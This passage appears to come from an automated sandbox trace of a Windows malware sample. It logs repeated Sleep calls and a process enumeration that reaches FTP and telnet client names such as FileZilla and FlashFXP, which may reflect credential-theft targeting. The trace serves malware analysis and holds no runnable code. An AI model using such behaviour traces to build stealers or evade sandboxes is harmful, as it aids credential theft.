Sleep (dwMilliseconds=0x258) [0286.180] Sleep (dwMilliseconds=0x258) [0286.235] Sleep (dwMilliseconds=0x258) [0286.299] Sleep (dwMilliseconds=0x258) [0286.412] Sleep (dwMilliseconds=0x258) [0286.538] Sleep (dwMilliseconds=0x258) [0286.599] Sleep (dwMilliseconds=0x258) [0286.682] Sleep (dwMilliseconds=0x258) [0286.778] Sleep (dwMilliseconds=0x258) [0286.833] Sleep (dwMilliseconds=0x258) [0286.877] Sleep (dwMilliseconds=0x258) [0286.929] Sleep (dwMilliseconds=0x258) [0286.973] Sleep (dwMilliseconds=0x258) [0287.035] Sleep (dwMilliseconds=0x258) [0287.083] Sleep (dwMilliseconds=0x258) [0287.132] Sleep (dwMilliseconds=0x258) [0287.225] Sleep (dwMilliseconds=0x258) [0287.271] Sleep (dwMilliseconds=0x258) [0287.306] Sleep (dwMilliseconds=0x258) [0287.403] Sleep (dwMilliseconds=0x258) [0287.458] Sleep (dwMilliseconds=0x258) [0287.478] Sleep (dwMilliseconds=0x258) [0287.481] Sleep (dwMilliseconds=0x258) [0287.530] Sleep (dwMilliseconds=0x258) [0287.556] Sleep (dwMilliseconds=0x258) [0287.560] Sleep (dwMilliseconds=0x258) [0287.617] Sleep (dwMilliseconds=0x258) [0287.669] Sleep (dwMilliseconds=0x258) [0287.701] Sleep (dwMilliseconds=0x258) [0287.749] Sleep (dwMilliseconds=0x258) [0287.826] Sleep (dwMilliseconds=0x258) [0287.886] Sleep (dwMilliseconds=0x258) [0287.981] Sleep (dwMilliseconds=0x258) [0288.108] Sleep (dwMilliseconds=0x258) [0288.124] Sleep (dwMilliseconds=0x258) [0288.173] Sleep (dwMilliseconds=0x258) [0288.231] Sleep (dwMilliseconds=0x258) [0288.271] Sleep (dwMilliseconds=0x258) [0288.357] Sleep (dwMilliseconds=0x258) [0288.446] Sleep (dwMilliseconds=0x258) [0288.486] Sleep (dwMilliseconds=0x258) [0288.532] Sleep (dwMilliseconds=0x258) [0288.564] Sleep (dwMilliseconds=0x258) [0288.603] Sleep (dwMilliseconds=0x258) [0288.623] Sleep (dwMilliseconds=0x258) [0288.703] Sleep (dwMilliseconds=0x258) [0288.769] Sleep (dwMilliseconds=0x258) [0288.818] Sleep (dwMilliseconds=0x258) [0288.877] Sleep (dwMilliseconds=0x258) [0288.944] Sleep (dwMilliseconds=0x258) [0288.986] Sleep (dwMilliseconds=0x258) [0289.050] Sleep (dwMilliseconds=0x258) [0289.093] Sleep (dwMilliseconds=0x258) [0289.169] Sleep (dwMilliseconds=0x258) [0289.212] Sleep (dwMilliseconds=0x258) [0289.383] Sleep (dwMilliseconds=0x258) [0289.394] Sleep (dwMilliseconds=0x258) [0289.435] Sleep (dwMilliseconds=0x258) [0289.483] Sleep (dwMilliseconds=0x258) [0289.578] Sleep (dwMilliseconds=0x258) [0289.642] Sleep (dwMilliseconds=0x258) [0289.715] Sleep (dwMilliseconds=0x258) [0289.815] Sleep (dwMilliseconds=0x258) [0289.863] Sleep (dwMilliseconds=0x258) [0289.891] Sleep (dwMilliseconds=0x258) [0289.934] Sleep (dwMilliseconds=0x258) [0289.956] Sleep (dwMilliseconds=0x258) [0290.022] Sleep (dwMilliseconds=0x258) [0290.126] Sleep (dwMilliseconds=0x258) [0290.204] Sleep (dwMilliseconds=0x258) [0290.264] Sleep (dwMilliseconds=0x258) [0290.352] Sleep (dwMilliseconds=0x258) [0290.366] Sleep (dwMilliseconds=0x258) [0290.372] Sleep (dwMilliseconds=0x258) [0290.453] Sleep (dwMilliseconds=0x258) [0290.488] Sleep (dwMilliseconds=0x258) [0290.529] Sleep (dwMilliseconds=0x258) [0290.623] Sleep (dwMilliseconds=0x258) [0290.685] Sleep (dwMilliseconds=0x258) [0290.748] Sleep (dwMilliseconds=0x258) [0290.813] Sleep (dwMilliseconds=0x258) [0290.828] Sleep (dwMilliseconds=0x258) [0290.843] Sleep (dwMilliseconds=0x258) [0290.873] Sleep (dwMilliseconds=0x258) [0290.920] Sleep (dwMilliseconds=0x258) [0290.970] Sleep (dwMilliseconds=0x258) [0291.016] Sleep (dwMilliseconds=0x258) [0291.108] Sleep (dwMilliseconds=0x258) [0291.186] Sleep (dwMilliseconds=0x258) [0291.211] Sleep (dwMilliseconds=0x258) [0291.251] Sleep (dwMilliseconds=0x258) [0291.275] Sleep (dwMilliseconds=0x258) [0291.278] Sleep (dwMilliseconds=0x258) [0291.295] Sleep (dwMilliseconds=0x258) [0291.361] Sleep (dwMilliseconds=0x258) [0291.410] Sleep (dwMilliseconds=0x258) [0291.454] Sleep (dwMilliseconds=0x258) [0291.545] Sleep (dwMilliseconds=0x258) [0291.624] Sleep (dwMilliseconds=0x258) [0291.640] Sleep (dwMilliseconds=0x258) [0291.694] Sleep (dwMilliseconds=0x258) [0291.713] Sleep (dwMilliseconds=0x258) [0291.716] Sleep (dwMilliseconds=0x258) [0291.751] Sleep (dwMilliseconds=0x258) [0291.845] Sleep (dwMilliseconds=0x258) [0291.892] Sleep (dwMilliseconds=0x258) [0291.986] Sleep (dwMilliseconds=0x258) [0292.080] Sleep (dwMilliseconds=0x258) [0292.153] Sleep (dwMilliseconds=0x258) [0292.209] Sleep (dwMilliseconds=0x258) [0292.231] Sleep (dwMilliseconds=0x258) [0292.326] Sleep (dwMilliseconds=0x258) [0292.468] Sleep (dwMilliseconds=0x258) [0292.561] Sleep (dwMilliseconds=0x258) [0292.657] Sleep (dwMilliseconds=0x258) [0292.669] Sleep (dwMilliseconds=0x258) [0292.717] Sleep (dwMilliseconds=0x258) [0292.738] Sleep (dwMilliseconds=0x258) [0292.747] Sleep (dwMilliseconds=0x258) [0292.827] Sleep (dwMilliseconds=0x258) [0292.926] Sleep (dwMilliseconds=0x258) [0292.969] Sleep (dwMilliseconds=0x258) [0293.014] Sleep (dwMilliseconds=0x258) [0293.108] Sleep (dwMilliseconds=0x258) [0293.147] Sleep (dwMilliseconds=0x258) [0293.170] Sleep (dwMilliseconds=0x258) [0293.218] Sleep (dwMilliseconds=0x258) [0293.280] Sleep (dwMilliseconds=0x258) [0293.372] Sleep (dwMilliseconds=0x258) [0293.453] Sleep (dwMilliseconds=0x258) [0293.531] Sleep (dwMilliseconds=0x258) [0293.569] Sleep (dwMilliseconds=0x258) [0293.624] Sleep (dwMilliseconds=0x258) [0293.643] Sleep (dwMilliseconds=0x258) [0293.655] Sleep (dwMilliseconds=0x258) [0293.736] Sleep (dwMilliseconds=0x258) [0293.815] Sleep (dwMilliseconds=0x258) [0293.905] Sleep (dwMilliseconds=0x258) [0293.956] Sleep (dwMilliseconds=0x258) [0294.048] Sleep (dwMilliseconds=0x258) [0294.172] Sleep (dwMilliseconds=0x258) [0294.235] Sleep (dwMilliseconds=0x258) [0294.270] Sleep (dwMilliseconds=0x258) [0294.317] Sleep (dwMilliseconds=0x258) [0294.332] Sleep (dwMilliseconds=0x258) [0294.406] Sleep (dwMilliseconds=0x258) [0294.439] Sleep (dwMilliseconds=0x258) [0294.520] Sleep (dwMilliseconds=0x258) [0294.531] Sleep (dwMilliseconds=0x258) [0294.548] Sleep (dwMilliseconds=0x258) [0294.595] Sleep (dwMilliseconds=0x258) [0294.637] Sleep (dwMilliseconds=0x258) [0294.705] Sleep (dwMilliseconds=0x258) [0294.780] Sleep (dwMilliseconds=0x258) [0294.826] Sleep (dwMilliseconds=0x258) [0294.890] Sleep (dwMilliseconds=0x258) [0294.987] Sleep (dwMilliseconds=0x258) [0295.048] Sleep (dwMilliseconds=0x258) [0295.112] Sleep (dwMilliseconds=0x258) [0295.267] Sleep (dwMilliseconds=0x258) [0295.328] Sleep (dwMilliseconds=0x258) [0295.421] Sleep (dwMilliseconds=0x258) [0295.471] Sleep (dwMilliseconds=0x258) [0295.512] Sleep (dwMilliseconds=0x258) [0295.658] Sleep (dwMilliseconds=0x258) [0295.731] Sleep (dwMilliseconds=0x258) [0295.797] Sleep (dwMilliseconds=0x258) [0295.887] Sleep (dwMilliseconds=0x258) Thread: id = 49 os_tid = 0xcb8 [0096.976] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb8c [0096.995] Process32First (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.997] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x75, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.999] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.000] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.002] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.004] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.006] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.028] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.030] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.032] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.034] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.036] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.037] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.041] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.042] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.044] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.046] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.049] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.050] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.052] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.053] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0097.055] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.057] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0097.058] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.059] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0097.061] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.062] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0097.063] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0097.064] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.066] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0097.067] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0097.068] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.073] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.074] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0097.076] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0097.077] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0097.078] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0097.079] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0097.081] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0097.082] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0097.083] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0097.084] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0097.086] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0097.087] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0097.089] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0097.090] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0097.091] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0097.092] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0097.094] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0097.095] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0097.096] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0097.097] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0097.099] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0097.100] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0097.102] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0097.103] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0097.104] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0097.105] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0097.107] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0097.109] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0097.110] Process32Next (in: hSnapshot=0xb8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, 